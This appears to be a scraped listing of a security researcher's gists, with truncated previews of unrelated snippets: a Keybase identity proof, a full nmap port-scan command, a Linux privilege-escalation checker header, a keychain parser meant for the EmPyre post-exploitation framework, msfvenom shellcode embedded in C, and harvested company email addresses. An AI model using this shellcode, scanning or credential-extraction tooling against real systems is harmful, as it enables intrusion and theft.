I hereby claim:
- I am killswitch-gui on github.
- I am killswitchgui (https://keybase.io/killswitchgui) on keybase.
- I have a public key whose fingerprint is 7F6A A2E0 2FC2 9D10 4327 B138 CB86 0113 C1B6 9F03
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# 255 min host group | |
# min rate 1000 should be fine for internal | |
# Full Port Scan / --open | |
nmap -Pn -n -sS -p- -sV --min-hostgroup 255 --min-rtt-timeout 25ms --max-rtt-timeout 100ms --max-retries 1 --max-scan-delay 0 --min-rate 1000 -oA <customer-#> -vvv --open -iL <IPLIST> |
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |
import zlib | |
import struct | |
import sys | |
# 4 byte header | |
# crc32 uLong | |
# | |
# 0 1 | |
# +---+---+ | |
# |CMF|FLG| |
# built off https://github.com/n0fate/chainbreaker | |
# for EmPyre dynamic execution | |
# all credit goes too: n0fate | |
# http://web.mit.edu/darwin/src/modules/Security/cdsa/cdsa/cssmtype.h | |
KEY_TYPE = { | |
0x00+0x0F : 'CSSM_KEYCLASS_PUBLIC_KEY', | |
0x01+0x0F : 'CSSM_KEYCLASS_PRIVATE_KEY', | |
0x02+0x0F : 'CSSM_KEYCLASS_SESSION_KEY', | |
0x03+0x0F : 'CSSM_KEYCLASS_SECRET_PART', |
unsigned char wpcap_dll[] = { | |
0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
0xff, 0xff, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
0x08, 0x01, 0x00, 0x00, 0x0e, 0x1f, 0xba, 0x0e, 0x00, 0xb4, 0x09, 0xcd, | |
0x21, 0xb8, 0x01, 0x4c, 0xcd, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, | |
0x72, 0x6f, 0x67, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f, | |
0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20, |
#pragma comment(lib, "Shell32.lib") | |
#include <windows.h> | |
#include <shlobj.h> | |
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
int buf_len = 193; | |
unsigned char buf[] = | |
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" |
OS Name: Microsoft Windows 10 Pro | |
OS Manufacturer: Microsoft Corporation | |
OS Configuration: Standalone Workstation | |
OS Build Type: Multiprocessor Free | |
System Manufacturer: Micro-Star International Co., Ltd | |
System Model: MS-7A32 | |
System Type: x64-based PC | |
Total Physical Memory: 32,715 MB | |
Processor(s): 1 Processor(s) Installed. | |
[01]: AMD64 Family 23 Model 1 Stepping 1 AMD ~3800 Mhz (RYZEN 1700x) |
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
{ | |
"domain": "slack.com", | |
"active": true, | |
"last_update": 1525850454.678481, | |
"email_pattern": "", | |
"email_count": 3, | |
"emails": [ | |
{ | |
"email_address": "feedback@slack.com", | |
"first_name": "", |